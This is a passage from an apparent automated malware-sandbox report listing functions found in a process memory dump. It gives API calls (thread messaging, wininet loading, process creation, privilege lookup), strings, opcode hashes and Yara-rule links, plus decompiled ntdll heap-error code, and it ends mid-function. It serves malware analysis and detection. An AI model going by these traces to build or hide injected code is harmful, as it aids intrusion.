Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a673d9564591e78a7df34e39d975bcbfcca712c3fb900f60d2217d4beb81c445
Instruction ID: d18d11d9964c52087923f2ab5c2922c41e8c33b67a29c01a1776df7ca9c6b89f
Opcode Fuzzy Hash: a673d9564591e78a7df34e39d975bcbfcca712c3fb900f60d2217d4beb81c445
Instruction Fuzzy Hash: 6B9002A2212004035105B1694454616401A9FE0241B91C025E1005590DC5B588917165

Uniqueness

Uniqueness Score: -1.00%

Function 05269860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526986A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad4c63a155f29aa61e4570ca3df3a7e72d437814193af4aed61aa015d40ef70a
Instruction ID: 8eaac3f9c7417dca0bfb6c55cc230fa96a20410165fab4c16d1c79be24d81ede
Opcode Fuzzy Hash: ad4c63a155f29aa61e4570ca3df3a7e72d437814193af4aed61aa015d40ef70a
Instruction Fuzzy Hash: 3790027221100813E111A169454470700199FD0281FD1C416A0415558DD6E68952B161

Uniqueness

Uniqueness Score: -1.00%

Function 05269840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526984A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bbcab9aca00278259aaf324948bc9d27b608d02cd198756ce14f7eb90950ed5
Instruction ID: ea1cb0b9f606a3c788cfbab5c4b84d14f019b9c6ee6577acb30e9c0d1d97dc28
Opcode Fuzzy Hash: 5bbcab9aca00278259aaf324948bc9d27b608d02cd198756ce14f7eb90950ed5
Instruction Fuzzy Hash: ED900262252045526545F16944445074016AFE02817D1C016A1405950CC5B69856E661

Uniqueness

Uniqueness Score: -1.00%

Function 05269710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526971A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 40805f1e8a352a791ef4b5b0caacdc1c253594ddc7745ae25ce38e7e03d94b21
Instruction ID: 2c800bd8bb59ed727d281d8c86a549375e19b4a3681a51a41d31cb19cc657f6c
Opcode Fuzzy Hash: 40805f1e8a352a791ef4b5b0caacdc1c253594ddc7745ae25ce38e7e03d94b21
Instruction Fuzzy Hash: 2D90027221100802E100A5A9544864600159FE0341F91D015A5015555EC6F588917171

Uniqueness

Uniqueness Score: -1.00%

Function 05269780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526978A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3cc3cdaa8ca8628e32fbb8981e7e240f3849605712a3dfdddf8c3ff8bb9601d1
Instruction ID: b9755548a4eba9b7b05620087910cf485590450a02427507660d530c57022d84
Opcode Fuzzy Hash: 3cc3cdaa8ca8628e32fbb8981e7e240f3849605712a3dfdddf8c3ff8bb9601d1
Instruction Fuzzy Hash: D090026A22300402E180B169544860A00159FD1242FD1D419A0006558CC9A588696361

Uniqueness

Uniqueness Score: -1.00%

Function 05269FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05269FEA

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00f09f6a4589e8c5fc75de84f46abea25c1e3a1f651babc1e5d07080a3d2ce7d
Instruction ID: 114b9fbc9b2a1fb119cb7f2ada802084b9623275c6c8a21e21b1109b0740c139
Opcode Fuzzy Hash: 00f09f6a4589e8c5fc75de84f46abea25c1e3a1f651babc1e5d07080a3d2ce7d
Instruction Fuzzy Hash: 7590027232114802E110A169844470600159FD1241F91C415A0815558DC6E588917162

Uniqueness

Uniqueness Score: -1.00%

Function 05269660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526966A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0eba383283c5c1fbceb88dcd198fd458dc66fccfa1e3d6be1fde9e18e7f2ba8a
Instruction ID: 3e8a86c9f74ddc19174bfaa3738c29dceeb262eb3b66e701764522c3ee577f4b
Opcode Fuzzy Hash: 0eba383283c5c1fbceb88dcd198fd458dc66fccfa1e3d6be1fde9e18e7f2ba8a
Instruction Fuzzy Hash: 9590027221100C02E180B169444464A00159FD1341FD1C019A0016654DCAA58A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 05269650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0526965A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 760c35d6cc9ec7991e83b0ecca95e42e2e556dea8c52ca0f9f1e51b63b78b4fc
Instruction ID: b3fd88a1de27d9553ce9030520922ea702b9c28560bf24f1c6ccf8dfad08820a
Opcode Fuzzy Hash: 760c35d6cc9ec7991e83b0ecca95e42e2e556dea8c52ca0f9f1e51b63b78b4fc
Instruction Fuzzy Hash: 7190027221504C42E140B1694444A4600259FD0345F91C015A0055694DD6B58D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 05269A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05269A5A

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 41b159033f9c270c153b22eca658d70c41cc0aedd6eb581c323fd1141c42fb28
Instruction ID: 37bfcdfe1b08ea402e6751078b115a9c1692b4d6a0863933879d1a90ed546caf
Opcode Fuzzy Hash: 41b159033f9c270c153b22eca658d70c41cc0aedd6eb581c323fd1141c42fb28
Instruction Fuzzy Hash: 8C90026222180442E200A5794C54B0700159FD0343F91C119A0145554CC9A588616561

Uniqueness

Uniqueness Score: -1.00%

Function 052696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052696EA

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 286bbf19784b971171d1ce89a2fba10a7f33abedaf371ddc8fb9057643ee850c
Instruction ID: 82a5fd99954f9ef3694cbfe6ada4bad0d159e210f1a925850deed86f0e6c68a7
Opcode Fuzzy Hash: 286bbf19784b971171d1ce89a2fba10a7f33abedaf371ddc8fb9057643ee850c
Instruction Fuzzy Hash: A290027221108C02E110A169844474A00159FD0341F95C415A4415658DC6E588917161

Uniqueness

Uniqueness Score: -1.00%

Function 052696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052696DA

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebe0b5d639a12fca51fbfd0cbb3841ee0cd20ec72152dd27300e2fff7fcf863f
Instruction ID: 0d6753ae5abbcae94b65f582f13de7aeb352dfd565c8d62b41c74ae2a5edc6c1
Opcode Fuzzy Hash: ebe0b5d639a12fca51fbfd0cbb3841ee0cd20ec72152dd27300e2fff7fcf863f
Instruction Fuzzy Hash: 1090027221100C42E100A1694444B4600159FE0341F91C01AA0115654DC6A5C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 00DC722D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00DC72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00DC72FB

Strings

3333, xrefs: 00DC723E

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID: 3333
API String ID: 1836367815-2924271548
Opcode ID: 68285e98f285c98caa36939a50d1d00e26dc22d20277f0ad681b0df0fa198184
Instruction ID: df1ce99157ee967c2d1aabd264d2ee9f4e27210eb2cefa5e179f7e7335f5e9e6
Opcode Fuzzy Hash: 68285e98f285c98caa36939a50d1d00e26dc22d20277f0ad681b0df0fa198184
Instruction Fuzzy Hash: C9110831A4021A7BEB25AA989C53FBEB35C9F41B11F18401DFE04AB2C1EA94A90147F6

Uniqueness

Uniqueness Score: -1.00%

Function 00DD7300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00DD73A8

Strings

wininet.dll, xrefs: 00DD735E, 00DD7367
net.dll, xrefs: 00DD7371, 00DD73F7, 00DD73CF, 00DD73DB, 00DD7403

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
Instruction ID: 05d93ce1959799ce4979093e4b904a3c1f55e6729fc6aa24a47c0d9b57c4d12e
Opcode Fuzzy Hash: a39b82ecfbac99471acaa30ec38214f402b2a6bfa8d79c148fe129acb514d8ec
Instruction Fuzzy Hash: 0B318EB6505700ABC711EF64C8A1FA7B7B8EF88700F04815EFA595B241E730A945CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD72F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00DD73A8

Strings

wininet.dll, xrefs: 00DD735E, 00DD7367
net.dll, xrefs: 00DD7371, 00DD73CF, 00DD73DB

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 82f0a45ab364a6fb276e60d2c683801f4b153e3172e7aba8b1cb663c07cc8947
Instruction ID: d7038c3ea63a0d2e24c46f71f833d99d1493fd87f7981d67ca98dcfceda919f5
Opcode Fuzzy Hash: 82f0a45ab364a6fb276e60d2c683801f4b153e3172e7aba8b1cb663c07cc8947
Instruction Fuzzy Hash: F2218FB5605200ABC711EF68C8A1F6BB7B4EF88700F14816EFA196B345E770A845CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD88F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00DC3B93), ref: 00DD891D

Strings

.z`, xrefs: 00DD890C, 00DD8918

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: ba06270421be0a5b4af6508e93d0e1642e8c816f86db6ad321963372b98ba234
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACEF88750F018559FA085B242C631E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00DC72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00DC72FB

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction ID: 1fafa637ef647623d6867fb7393cb305f7988fc680b76db7add29b762190d454
Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
Instruction Fuzzy Hash: EC01A731A8032AB7E721A6949C43FBEB76C9B40B51F144119FF04BB1C1EAD4690546F6

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8A41, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFC2,00DCCFC2,?,00000000,?,?), ref: 00DD8A80

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6ad6320e73e3411e0a0397dd402a38750c9ebed3675bd2aefaccfe6a826a6e7b
Instruction ID: f3dfc849574544b2d2cfc43f1309f63833a30c3bbd035bc9c8c9990582103abb
Opcode Fuzzy Hash: 6ad6320e73e3411e0a0397dd402a38750c9ebed3675bd2aefaccfe6a826a6e7b
Instruction Fuzzy Hash: F00169B6200209AFDB10DF88CC84EEB77ADAF88340F118259FA0897241C631E911CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DC9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00DC9BB2

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: a726d915cbc021ca0a048d872bc4cee5dc0a8eb31ba7b9541fc6c3ddd9504b71
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: 54010CB5D0020EBBDF10DAA4EC86F9EB3799B54708F04419AA90897285F631EA148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00DD89B4

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: edff1b5a1dad245b5e3bb3e2fbc0e271f3246933544c67256455d036458cbb77
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: B101AFB2214208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DD7430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00DCCCF0,?,?), ref: 00DD746C

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
Instruction ID: 661d82d3948ccf8bde9cf2921b279ee9292292e75f59dac5c58093237f006a80
Opcode Fuzzy Hash: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
Instruction Fuzzy Hash: 25E092333803043AE73065A9AC03FA7B39CCB81B20F544026FA4DEB2C1E5A5F80142F5

Uniqueness

Uniqueness Score: -1.00%

Function 00DD88B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00DD3536,?,00DD3CAF,00DD3CAF,?,00DD3536,?,?,?,?,?,00000000,00000000,?), ref: 00DD88DD

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 63304ede9b389f954ed1c67c145156269801b5cd82fcf7e15071d02e3ef6900a
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: C0E012B1200208ABDB14EF99CC45EA777ACEF88650F118559FA085B242C631F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DD8A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFC2,00DCCFC2,?,00000000,?,?), ref: 00DD8A80

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 61b58af333cbfb55d77acba0079fc0ee1a642c8a530e6bde7aa91c691e252024
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A3E01AB12002086BDB10DF89CC85EE777ADEF88650F018155FA0857241C931E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00DCD430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00DC7C83,?), ref: 00DCD45B

Memory Dump Source

Source File: 00000009.00000002.607143733.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: fd1d649bd90d027a4802ed9ce37d0ed6af50d069256ea74a9d158b2b49772bf2
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 88D05E717503042AE610AAA49C03F2633899B45B40F494064FA48973C3E960E5008171

Uniqueness

Uniqueness Score: -1.00%

Function 0526967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05269694

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 939c3d34c00788244eab697a909de348b4a2d94321edbf36dd41b9bfe0c483d5
Instruction ID: 79f1b906e0b14b7554491bc20207dd86bcde49d80307b10f74e82a257c8f08f6
Opcode Fuzzy Hash: 939c3d34c00788244eab697a909de348b4a2d94321edbf36dd41b9bfe0c483d5
Instruction Fuzzy Hash: 5CB09B729115C5C5E611D7704708B2779117FD0741F56C055D1060641A4778C0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 052DB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** enter .cxr %p for the context, xrefs: 052DB50D
*** enter .exr %p for the exception record, xrefs: 052DB4F1
The resource is owned shared by %d threads, xrefs: 052DB37E
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 052DB47D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 052DB39B
an invalid address, %p, xrefs: 052DB4CF
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 052DB3D6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 052DB2DC
This failed because of error %Ix., xrefs: 052DB446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 052DB38F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 052DB476
<unknown>, xrefs: 052DB27E, 052DB2D1, 052DB350, 052DB399, 052DB417, 052DB48E
*** Resource timeout (%p) in %ws:%s, xrefs: 052DB352
*** An Access Violation occurred in %ws:%s, xrefs: 052DB48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 052DB484
Go determine why that thread has not released the critical section., xrefs: 052DB3C5
The critical section is owned by thread %p., xrefs: 052DB3B9
*** Inpage error in %ws:%s, xrefs: 052DB418
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 052DB53F
The instruction at %p referenced memory at %p., xrefs: 052DB432
The resource is owned exclusively by thread %p, xrefs: 052DB374
*** then kb to get the faulting stack, xrefs: 052DB51C
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 052DB314
write to, xrefs: 052DB4A6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 052DB323
*** A stack buffer overrun occurred in %ws:%s, xrefs: 052DB2F3
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 052DB305
read from, xrefs: 052DB4AD, 052DB4B2
The instruction at %p tried to %s , xrefs: 052DB4B6
a NULL pointer, xrefs: 052DB4E0

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 6caf0dc8aeacef0c5ee919b64488c64da7f64fa9b13b55f9737c2aed211dda2f
Instruction ID: 3d5415b147d4b1ec326333501603a0c1943072eb44de085ca4a0c100260ad862
Opcode Fuzzy Hash: 6caf0dc8aeacef0c5ee919b64488c64da7f64fa9b13b55f9737c2aed211dda2f
Instruction Fuzzy Hash: 25812575B30210FFDB269F058CA9DBB7B76AF57B91F420044F8092F111E2B68511EAB6

Uniqueness

Uniqueness Score: -1.00%

Function 052E1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E052E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x52048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0522B150();
				} else {
					E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x531589c);
				E0522B150("Heap error detected at %p (heap handle %p)\n",  *0x53158a0);
				_t27 =  *0x5315898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M052E1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0522B150();
				} else {
					E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0522B150("Error code: %d - %s\n",  *0x5315898);
				_t113 =  *0x53158a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0522B150();
					} else {
						E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0522B150("Parameter1: %p\n",  *0x53158a4);
				}
				_t115 =  *0x53158a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0522B150();
					} else {
						E0522B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0522B150("Parameter2: %p\n",  *0x53158a8);
				}
				_t117 =  *0x53158ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0522B150();
					} else {
